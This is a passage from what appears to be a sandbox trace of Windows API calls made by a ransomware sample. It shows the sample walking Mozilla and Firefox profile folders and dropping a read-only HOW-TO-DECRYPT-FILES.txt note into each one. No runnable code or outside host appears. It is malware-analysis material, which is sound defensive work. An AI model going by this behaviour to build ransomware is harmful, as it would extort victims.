lpOverlapped=0x0 | out: lpBuffer=0x1c137f0*, lpNumberOfBytesWritten=0x18eaa4*=0x18da, lpOverlapped=0x0) returned 1 [0052.045] GetLastError () returned 0x0 [0052.045] CloseHandle (hObject=0x184) returned 1 [0052.046] GetLastError () returned 0x0 [0052.046] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e66c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x78 [0052.046] GetLastError () returned 0x0 [0052.046] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0052.046] GetLastError () returned 0x0 [0052.046] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft", nBufferLength=0x105, lpBuffer=0x18e928, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft", lpFilePart=0x0) returned 0x2a [0052.046] GetLastError () returned 0x0 [0052.046] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla", nBufferLength=0x105, lpBuffer=0x18e928, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla", lpFilePart=0x0) returned 0x28 [0052.046] GetLastError () returned 0x0 [0052.046] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0052.046] GetLastError () returned 0x0 [0052.046] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e84c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0052.046] GetLastError () returned 0x0 [0052.046] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla", nBufferLength=0x105, lpBuffer=0x18e800, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla", lpFilePart=0x0) returned 0x28 [0052.046] GetLastError () returned 0x0 [0052.046] SetErrorMode (uMode=0x1) returned 0x0 [0052.046] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0052.047] GetLastError () returned 0x0 [0052.047] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.047] GetLastError () returned 0x0 [0052.047] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.047] GetLastError () returned 0x0 [0052.047] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.047] GetLastError () returned 0x0 [0052.047] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0052.047] GetLastError () returned 0x12 [0052.047] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0052.047] SetErrorMode (uMode=0x0) returned 0x1 [0052.047] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla", nBufferLength=0x105, lpBuffer=0x18e800, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla", lpFilePart=0x0) returned 0x28 [0052.047] GetLastError () returned 0x12 [0052.047] SetErrorMode (uMode=0x1) returned 0x0 [0052.047] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0052.047] GetLastError () returned 0x12 [0052.047] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.047] GetLastError () returned 0x12 [0052.047] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.047] GetLastError () returned 0x12 [0052.047] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.047] GetLastError () returned 0x12 [0052.047] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0052.047] GetLastError () returned 0x12 [0052.048] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0052.048] SetErrorMode (uMode=0x0) returned 0x1 [0052.048] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Extensions", nBufferLength=0x105, lpBuffer=0x18e8bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Extensions", lpFilePart=0x0) returned 0x33 [0052.048] GetLastError () returned 0x12 [0052.048] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0052.048] GetLastError () returned 0x12 [0052.048] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0052.048] GetLastError () returned 0x12 [0052.048] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Extensions", nBufferLength=0x105, lpBuffer=0x18e794, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Extensions", lpFilePart=0x0) returned 0x33 [0052.048] GetLastError () returned 0x12 [0052.048] SetErrorMode (uMode=0x1) returned 0x0 [0052.048] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Extensions\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0052.048] GetLastError () returned 0x12 [0052.048] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.048] GetLastError () returned 0x12 [0052.048] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0052.048] GetLastError () returned 0x12 [0052.048] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0052.048] SetErrorMode (uMode=0x0) returned 0x1 [0052.048] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Extensions", nBufferLength=0x105, lpBuffer=0x18e794, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Extensions", lpFilePart=0x0) returned 0x33 [0052.048] GetLastError () returned 0x12 [0052.048] SetErrorMode (uMode=0x1) returned 0x0 [0052.048] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Extensions\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0052.048] GetLastError () returned 0x12 [0052.048] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.048] GetLastError () returned 0x12 [0052.049] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0052.049] GetLastError () returned 0x12 [0052.049] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0052.049] SetErrorMode (uMode=0x0) returned 0x1 [0052.049] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox", nBufferLength=0x105, lpBuffer=0x18e8bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox", lpFilePart=0x0) returned 0x30 [0052.049] GetLastError () returned 0x12 [0052.049] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0052.049] GetLastError () returned 0x12 [0052.049] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0052.049] GetLastError () returned 0x12 [0052.049] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox", nBufferLength=0x105, lpBuffer=0x18e794, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox", lpFilePart=0x0) returned 0x30 [0052.049] GetLastError () returned 0x12 [0052.049] SetErrorMode (uMode=0x1) returned 0x0 [0052.049] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0052.049] GetLastError () returned 0x12 [0052.049] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.049] GetLastError () returned 0x12 [0052.049] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.049] GetLastError () returned 0x12 [0052.049] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.049] GetLastError () returned 0x12 [0052.049] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.049] GetLastError () returned 0x12 [0052.049] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0052.049] GetLastError () returned 0x12 [0052.049] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0052.049] SetErrorMode (uMode=0x0) returned 0x1 [0052.049] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox", nBufferLength=0x105, lpBuffer=0x18e794, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox", lpFilePart=0x0) returned 0x30 [0052.049] GetLastError () returned 0x12 [0052.049] SetErrorMode (uMode=0x1) returned 0x0 [0052.049] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0052.050] GetLastError () returned 0x12 [0052.050] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.050] GetLastError () returned 0x12 [0052.050] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.050] GetLastError () returned 0x12 [0052.050] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.050] GetLastError () returned 0x12 [0052.050] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.050] GetLastError () returned 0x12 [0052.050] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0052.050] GetLastError () returned 0x12 [0052.050] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0052.050] SetErrorMode (uMode=0x0) returned 0x1 [0052.050] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini", nBufferLength=0x105, lpBuffer=0x18e848, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini", lpFilePart=0x0) returned 0x3d [0052.050] GetLastError () returned 0x12 [0052.050] SetErrorMode (uMode=0x1) returned 0x0 [0052.050] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles.ini"), fInfoLevelId=0x0, lpFileInformation=0x1c19770 | out: lpFileInformation=0x1c19770*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7b79aeb0, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x7b79aeb0, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0x7b79aeb0, ftLastWriteTime.dwHighDateTime=0x1d2da1b, nFileSizeHigh=0x0, nFileSizeLow=0x6f)) returned 1 [0052.050] GetLastError () returned 0x12 [0052.050] SetErrorMode (uMode=0x0) returned 0x1 [0052.050] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e6f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x49 [0052.050] GetLastError () returned 0x12 [0052.050] SetErrorMode (uMode=0x1) returned 0x0 [0052.050] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0052.051] GetLastError () returned 0x0 [0052.051] GetFileType (hFile=0x184) returned 0x1 [0052.051] SetErrorMode (uMode=0x0) returned 0x1 [0052.051] GetFileType (hFile=0x184) returned 0x1 [0052.051] WriteFile (in: hFile=0x184, lpBuffer=0x1c35128*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ec54, lpOverlapped=0x0 | out: lpBuffer=0x1c35128*, lpNumberOfBytesWritten=0x18ec54*=0x18da, lpOverlapped=0x0) returned 1 [0052.052] GetLastError () returned 0x0 [0052.052] CloseHandle (hObject=0x184) returned 1 [0052.052] GetLastError () returned 0x0 [0052.052] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e81c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x49 [0052.052] GetLastError () returned 0x0 [0052.052] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0052.053] GetLastError () returned 0x0 [0052.053] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports", nBufferLength=0x105, lpBuffer=0x18e850, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports", lpFilePart=0x0) returned 0x3e [0052.053] GetLastError () returned 0x0 [0052.053] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0052.053] GetLastError () returned 0x0 [0052.053] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e774, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0052.053] GetLastError () returned 0x0 [0052.053] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports", nBufferLength=0x105, lpBuffer=0x18e728, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports", lpFilePart=0x0) returned 0x3e [0052.053] GetLastError () returned 0x0 [0052.053] SetErrorMode (uMode=0x1) returned 0x0 [0052.053] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0052.053] GetLastError () returned 0x0 [0052.053] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.053] GetLastError () returned 0x0 [0052.053] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.053] GetLastError () returned 0x0 [0052.053] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0052.053] GetLastError () returned 0x12 [0052.053] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0052.053] SetErrorMode (uMode=0x0) returned 0x1 [0052.053] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports", nBufferLength=0x105, lpBuffer=0x18e728, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports", lpFilePart=0x0) returned 0x3e [0052.053] GetLastError () returned 0x12 [0052.053] SetErrorMode (uMode=0x1) returned 0x0 [0052.053] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0052.053] GetLastError () returned 0x12 [0052.053] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.054] GetLastError () returned 0x12 [0052.054] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.054] GetLastError () returned 0x12 [0052.054] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0052.054] GetLastError () returned 0x12 [0052.054] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0052.054] SetErrorMode (uMode=0x0) returned 0x1 [0052.054] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20131025151332", nBufferLength=0x105, lpBuffer=0x18e7dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20131025151332", lpFilePart=0x0) returned 0x58 [0052.054] GetLastError () returned 0x12 [0052.054] SetErrorMode (uMode=0x1) returned 0x0 [0052.054] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20131025151332" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\crash reports\\installtime20131025151332"), fInfoLevelId=0x0, lpFileInformation=0x1c3854c | out: lpFileInformation=0x1c3854c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7b774d50, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x7b774d50, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0x7b774d50, ftLastWriteTime.dwHighDateTime=0x1d2da1b, nFileSizeHigh=0x0, nFileSizeLow=0xa)) returned 1 [0052.054] GetLastError () returned 0x12 [0052.054] SetErrorMode (uMode=0x0) returned 0x1 [0052.054] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e688, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0052.054] GetLastError () returned 0x12 [0052.054] SetErrorMode (uMode=0x1) returned 0x0 [0052.054] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\crash reports\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0052.054] GetLastError () returned 0x0 [0052.055] GetFileType (hFile=0x184) returned 0x1 [0052.055] SetErrorMode (uMode=0x0) returned 0x1 [0052.055] GetFileType (hFile=0x184) returned 0x1 [0052.055] WriteFile (in: hFile=0x184, lpBuffer=0x1c53f50*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ebe8, lpOverlapped=0x0 | out: lpBuffer=0x1c53f50*, lpNumberOfBytesWritten=0x18ebe8*=0x18da, lpOverlapped=0x0) returned 1 [0052.056] GetLastError () returned 0x0 [0052.056] CloseHandle (hObject=0x184) returned 1 [0052.056] GetLastError () returned 0x0 [0052.056] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0052.056] GetLastError () returned 0x0 [0052.056] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0052.056] GetLastError () returned 0x0 [0052.056] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles", nBufferLength=0x105, lpBuffer=0x18e850, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles", lpFilePart=0x0) returned 0x39 [0052.056] GetLastError () returned 0x0 [0052.056] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0052.056] GetLastError () returned 0x0 [0052.056] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e774, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0052.056] GetLastError () returned 0x0 [0052.056] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles", nBufferLength=0x105, lpBuffer=0x18e728, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles", lpFilePart=0x0) returned 0x39 [0052.056] GetLastError () returned 0x0 [0052.056] SetErrorMode (uMode=0x1) returned 0x0 [0052.056] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0052.056] GetLastError () returned 0x0 [0052.056] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.056] GetLastError () returned 0x0 [0052.056] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.056] GetLastError () returned 0x0 [0052.056] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0052.056] GetLastError () returned 0x12 [0052.057] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0052.057] SetErrorMode (uMode=0x0) returned 0x1 [0052.057] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles", nBufferLength=0x105, lpBuffer=0x18e728, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles", lpFilePart=0x0) returned 0x39 [0052.057] GetLastError () returned 0x12 [0052.057] SetErrorMode (uMode=0x1) returned 0x0 [0052.057] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0052.057] GetLastError () returned 0x12 [0052.057] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.057] GetLastError () returned 0x12 [0052.057] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.057] GetLastError () returned 0x12 [0052.057] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0052.057] GetLastError () returned 0x12 [0052.057] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0052.057] SetErrorMode (uMode=0x0) returned 0x1 [0052.057] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default", nBufferLength=0x105, lpBuffer=0x18e7e4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default", lpFilePart=0x0) returned 0x4a [0052.057] GetLastError () returned 0x12 [0052.057] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0052.057] GetLastError () returned 0x12 [0052.057] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0052.059] GetLastError () returned 0x12 [0052.059] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.060] GetLastError () returned 0x12 [0052.060] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.060] GetLastError () returned 0x12 [0052.060] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.060] GetLastError () returned 0x12 [0052.060] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.060] GetLastError () returned 0x12 [0052.060] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.060] GetLastError () returned 0x12 [0052.060] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.060] GetLastError () returned 0x12 [0052.060] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.060] GetLastError () returned 0x12 [0052.060] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.060] GetLastError () returned 0x12 [0052.060] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.060] GetLastError () returned 0x12 [0052.060] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.060] GetLastError () returned 0x12 [0052.060] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.060] GetLastError () returned 0x12 [0052.060] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.060] GetLastError () returned 0x12 [0052.060] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.060] GetLastError () returned 0x12 [0052.060] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 